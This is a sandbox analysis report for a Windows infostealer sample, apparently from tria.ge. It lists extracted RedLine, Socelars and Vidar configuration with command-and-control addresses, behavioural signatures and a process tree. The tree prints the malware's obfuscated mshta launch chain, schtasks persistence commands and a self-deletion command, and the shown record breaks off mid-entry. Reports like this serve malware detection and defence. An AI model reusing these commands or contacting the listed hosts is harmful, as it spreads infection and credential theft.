Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

01a53007f9...68.exe

windows10_x64

10

022e3c30a1...66.exe

windows10_x64

10

02ca2b5bb7...35.exe

windows10_x64

10

0d69cafe70...cd.exe

windows10_x64

10

0df647f0a2...bc.exe

windows10_x64

10

1df367eead...2c.exe

windows10_x64

10

1e083736ae...33.exe

windows10_x64

10

1e662d9025...7d.exe

windows10_x64

10

2010009ff5...59.exe

windows10_x64

10

243379992d...93.exe

windows10_x64

10

2d63a14e4a...1a.exe

windows10_x64

10

30e6815ae0...51.exe

windows10_x64

1

364d3b0e94...fa.exe

windows10_x64

10

3a4e2dfbd7...00.exe

windows10_x64

10

4a4a606501...75.exe

windows10_x64

10

4d89b00768...c0.exe

windows10_x64

10

5524bfd826...5f.exe

windows10_x64

10

582bd655f4...9b.exe

windows10_x64

10

588b74dc8e...70.exe

windows10_x64

10

609accbb14...2b.exe

windows10_x64

10

620a9a3efa...11.exe

windows10_x64

10

623bb62b2b...7c.exe

windows10_x64

10

642c69b710...bc.exe

windows10_x64

10

6e18165c4a...34.exe

windows10_x64

10

78a82aa6d4...cd.exe

windows10_x64

8

809ed9e2d0...41.exe

windows10_x64

10

82bf2273f6...2f.exe

windows10_x64

10

9bd142ecfe...06.exe

windows10_x64

10

9c4880a98c...82.exe

windows10_x64

10

9d608ed375...11.exe

windows10_x64

10

9ed5bbddf1...6e.exe

windows10_x64

10

a1dad4a83d...c4.exe

windows10_x64

10

Resubmissions

10/11/2021, 14:52

211110-r84p8aedej 10

09/11/2021, 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    213s
  • max time network
    371s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    10/11/2021, 14:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    588b74dc8e2473c34be3e958cb4f63e6466feb0be21e7b0a6418c1c8112ee370.exe

  • Size

    4.6MB

  • MD5

    50693ca6be65ab9f3ab8dc4541821206

  • SHA1

    58f816723e3c1f58c6c90a1b4b19a97bf6765fb7

  • SHA256

    588b74dc8e2473c34be3e958cb4f63e6466feb0be21e7b0a6418c1c8112ee370

  • SHA512

    1f4935a35ae18890abaee552f2a2215bfcd6b7b9b337f48d4a8af9e3e69a90de61d4f5e09c939bd262e8dfc11503b7dd303934a866ace51969abc69a55bfe4cd

Score
10/10
redlinesocelarsvidar05.10builddiscoveryevasioninfostealerspywarestealersuricatathemidatrojanvmprotect

Malware Config

Extracted

Family

redline

Botnet

05.10

C2

80.92.205.116:59599

Extracted

Family

redline

Botnet

build

C2

77.232.40.127:8204

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

http://www.hhgenice.top/

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 4 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata
  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Downloads MZ/PE file
  • Executes dropped EXE 34 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

    vmprotect
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 7 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 35 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
      PID:484
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s UserManager
      1⤵
        PID:1256
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s SENS
        1⤵
          PID:1388
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1824
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2392
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2420
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                • Suspicious use of SetThreadContext
                • Modifies registry class
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:2588
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                  2⤵
                  • Drops file in System32 directory
                  • Checks processor information in registry
                  • Modifies data under HKEY_USERS
                  • Modifies registry class
                  PID:3012
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                1⤵
                  PID:2708
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                  1⤵
                    PID:2692
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1224
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1076
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:352
                        • C:\Users\Admin\AppData\Local\Temp\588b74dc8e2473c34be3e958cb4f63e6466feb0be21e7b0a6418c1c8112ee370.exe
                          "C:\Users\Admin\AppData\Local\Temp\588b74dc8e2473c34be3e958cb4f63e6466feb0be21e7b0a6418c1c8112ee370.exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3312
                          • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
                            "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:3500
                          • C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
                            "C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3948
                          • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
                            "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks whether UAC is enabled
                            • Suspicious use of AdjustPrivilegeToken
                            PID:660
                          • C:\Users\Admin\AppData\Local\Temp\Process.exe
                            "C:\Users\Admin\AppData\Local\Temp\Process.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2832
                          • C:\Users\Admin\AppData\Local\Temp\Install.exe
                            "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:1244
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 820
                              3⤵
                              • Drops file in Windows directory
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2796
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 892
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3736
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 928
                              3⤵
                              • Program crash
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1888
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 932
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3312
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 928
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2380
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1140
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3128
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1440
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2736
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1468
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3808
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1668
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2948
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1684
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3792
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1720
                              3⤵
                              • Program crash
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3624
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1744
                              3⤵
                              • Program crash
                              PID:1036
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1856
                              3⤵
                              • Program crash
                              PID:404
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1968
                              3⤵
                              • Program crash
                              PID:1036
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1924
                              3⤵
                              • Program crash
                              PID:3640
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1752
                              3⤵
                              • Program crash
                              PID:2724
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1828
                              3⤵
                              • Program crash
                              PID:2660
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1896
                              3⤵
                              • Program crash
                              PID:2232
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1952
                              3⤵
                              • Program crash
                              PID:3312
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 1768
                              3⤵
                              • Program crash
                              PID:2452
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 2044
                              3⤵
                              • Program crash
                              PID:3000
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              3⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2944
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im chrome.exe
                                4⤵
                                • Kills process with taskkill
                                PID:1648
                          • C:\Users\Admin\AppData\Local\Temp\Files.exe
                            "C:\Users\Admin\AppData\Local\Temp\Files.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:684
                          • C:\Users\Admin\AppData\Local\Temp\Folder.exe
                            "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:956
                          • C:\Users\Admin\AppData\Local\Temp\Details.exe
                            "C:\Users\Admin\AppData\Local\Temp\Details.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2312
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 656
                              3⤵
                              • Program crash
                              PID:4436
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 672
                              3⤵
                              • Program crash
                              PID:4768
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 676
                              3⤵
                              • Program crash
                              PID:4980
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 680
                              3⤵
                              • Program crash
                              PID:912
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 740
                              3⤵
                              • Program crash
                              PID:2992
                          • C:\Users\Admin\AppData\Local\Temp\File.exe
                            "C:\Users\Admin\AppData\Local\Temp\File.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:1636
                            • C:\Users\Admin\Pictures\Adobe Films\SyZN3DU4OVOwfugKVgnPT9Rr.exe
                              "C:\Users\Admin\Pictures\Adobe Films\SyZN3DU4OVOwfugKVgnPT9Rr.exe"
                              3⤵
                              • Executes dropped EXE
                              PID:2808
                            • C:\Users\Admin\Pictures\Adobe Films\D5fJE32FpstkplJDMJc35e0x.exe
                              "C:\Users\Admin\Pictures\Adobe Films\D5fJE32FpstkplJDMJc35e0x.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:1048
                            • C:\Users\Admin\Pictures\Adobe Films\1KpU1TtXI_ZlafRG3CvzfZK7.exe
                              "C:\Users\Admin\Pictures\Adobe Films\1KpU1TtXI_ZlafRG3CvzfZK7.exe"
                              3⤵
                              • Executes dropped EXE
                              • Checks BIOS information in registry
                              • Checks whether UAC is enabled
                              • Suspicious use of SetThreadContext
                              • Suspicious use of SetWindowsHookEx
                              PID:2452
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                4⤵
                                • Suspicious use of SetWindowsHookEx
                                PID:1236
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2452 -s 552
                                4⤵
                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                • Program crash
                                PID:2368
                            • C:\Users\Admin\Pictures\Adobe Films\nHwrSLUpzAX7gYNUdIqAly6O.exe
                              "C:\Users\Admin\Pictures\Adobe Films\nHwrSLUpzAX7gYNUdIqAly6O.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:1472
                            • C:\Users\Admin\Pictures\Adobe Films\bllpcYeFuAdbv29t8vWXnp8h.exe
                              "C:\Users\Admin\Pictures\Adobe Films\bllpcYeFuAdbv29t8vWXnp8h.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:1996
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                4⤵
                                  PID:4632
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    5⤵
                                    • Kills process with taskkill
                                    PID:4788
                              • C:\Users\Admin\Pictures\Adobe Films\dIsYqLv_fdSQv7r7qsBnoiOV.exe
                                "C:\Users\Admin\Pictures\Adobe Films\dIsYqLv_fdSQv7r7qsBnoiOV.exe"
                                3⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious use of SetWindowsHookEx
                                PID:2664
                                • C:\Users\Admin\Documents\l0pbnFzTO1J4KHiEE8DmttAD.exe
                                  "C:\Users\Admin\Documents\l0pbnFzTO1J4KHiEE8DmttAD.exe"
                                  4⤵
                                    PID:6068
                                    • C:\Users\Admin\Pictures\Adobe Films\nCcw9e3Rovwm7ZMYXL9NCbPc.exe
                                      "C:\Users\Admin\Pictures\Adobe Films\nCcw9e3Rovwm7ZMYXL9NCbPc.exe"
                                      5⤵
                                        PID:4164
                                      • C:\Users\Admin\Pictures\Adobe Films\MSlFzdBxGAuLDWccEIsaHZYN.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\MSlFzdBxGAuLDWccEIsaHZYN.exe"
                                        5⤵
                                          PID:1168
                                        • C:\Users\Admin\Pictures\Adobe Films\2Q0nWatax11Yufs6QXshAmRk.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\2Q0nWatax11Yufs6QXshAmRk.exe"
                                          5⤵
                                            PID:4388
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /c taskkill /f /im chrome.exe
                                              6⤵
                                                PID:1792
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /f /im chrome.exe
                                                  7⤵
                                                  • Kills process with taskkill
                                                  PID:5756
                                            • C:\Users\Admin\Pictures\Adobe Films\Ytwi1sr3FbLUUfU6OKpPC9d4.exe
                                              "C:\Users\Admin\Pictures\Adobe Films\Ytwi1sr3FbLUUfU6OKpPC9d4.exe"
                                              5⤵
                                                PID:4744
                                              • C:\Users\Admin\Pictures\Adobe Films\TH6jUu_TgpFeFNU5__0XOKXq.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\TH6jUu_TgpFeFNU5__0XOKXq.exe"
                                                5⤵
                                                  PID:4380
                                                • C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe"
                                                  5⤵
                                                    PID:5396
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                      6⤵
                                                        PID:4100
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\P1KqAH6NWmiWbIIla3uxHFc8.exe" ) do taskkill -f -iM "%~NxM"
                                                          7⤵
                                                            PID:5444
                                                            • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                              ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                              8⤵
                                                                PID:5712
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                  9⤵
                                                                    PID:1888
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                      10⤵
                                                                        PID:2076
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill -f -iM "P1KqAH6NWmiWbIIla3uxHFc8.exe"
                                                                    8⤵
                                                                    • Kills process with taskkill
                                                                    PID:4216
                                                            • C:\Users\Admin\Pictures\Adobe Films\SvsSCL2IEpd0vkAVzW2OYFbN.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\SvsSCL2IEpd0vkAVzW2OYFbN.exe"
                                                              5⤵
                                                                PID:6064
                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                  6⤵
                                                                    PID:5376
                                                                • C:\Users\Admin\Pictures\Adobe Films\Gdpfi58DZNrsSI0DfPIjQWqa.exe
                                                                  "C:\Users\Admin\Pictures\Adobe Films\Gdpfi58DZNrsSI0DfPIjQWqa.exe"
                                                                  5⤵
                                                                    PID:3904
                                                                    • C:\Users\Admin\Pictures\Adobe Films\Gdpfi58DZNrsSI0DfPIjQWqa.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\Gdpfi58DZNrsSI0DfPIjQWqa.exe" -u
                                                                      6⤵
                                                                        PID:5220
                                                                    • C:\Users\Admin\Pictures\Adobe Films\1WM6wJ2qxKqck1heKtgnogjl.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\1WM6wJ2qxKqck1heKtgnogjl.exe"
                                                                      5⤵
                                                                        PID:4364
                                                                      • C:\Users\Admin\Pictures\Adobe Films\F4aVBAt8ykWHylaHqBdYdfLU.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\F4aVBAt8ykWHylaHqBdYdfLU.exe"
                                                                        5⤵
                                                                          PID:4648
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-F1953.tmp\F4aVBAt8ykWHylaHqBdYdfLU.tmp
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-F1953.tmp\F4aVBAt8ykWHylaHqBdYdfLU.tmp" /SL5="$20310,506127,422400,C:\Users\Admin\Pictures\Adobe Films\F4aVBAt8ykWHylaHqBdYdfLU.exe"
                                                                            6⤵
                                                                              PID:1168
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                          4⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5364
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                          4⤵
                                                                          • Creates scheduled task(s)
                                                                          PID:5368
                                                                      • C:\Users\Admin\Pictures\Adobe Films\UZd252GyP5EktBjAuz4P0yv1.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\UZd252GyP5EktBjAuz4P0yv1.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:3112
                                                                      • C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:4036
                                                                        • C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\fKTj4eau7SCtQImeZ8P76uYh.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:1576
                                                                      • C:\Users\Admin\Pictures\Adobe Films\Dvu4OKQ3u5FjfTHraIGQbTNo.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\Dvu4OKQ3u5FjfTHraIGQbTNo.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:2252
                                                                      • C:\Users\Admin\Pictures\Adobe Films\1eMnL1tpomOzYwxwc1dsaYCP.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\1eMnL1tpomOzYwxwc1dsaYCP.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:2044
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 1eMnL1tpomOzYwxwc1dsaYCP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\1eMnL1tpomOzYwxwc1dsaYCP.exe" & del C:\ProgramData\*.dll & exit
                                                                          4⤵
                                                                            PID:6120
                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                              taskkill /im 1eMnL1tpomOzYwxwc1dsaYCP.exe /f
                                                                              5⤵
                                                                              • Kills process with taskkill
                                                                              PID:2960
                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                              timeout /t 6
                                                                              5⤵
                                                                              • Delays execution with timeout.exe
                                                                              PID:5940
                                                                        • C:\Users\Admin\Pictures\Adobe Films\6d_39r1ohc1azL93QzpGtQhB.exe
                                                                          "C:\Users\Admin\Pictures\Adobe Films\6d_39r1ohc1azL93QzpGtQhB.exe"
                                                                          3⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1916
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 664
                                                                            4⤵
                                                                            • Program crash
                                                                            PID:1336
                                                                          • C:\Windows\SysWOW64\WerFault.exe
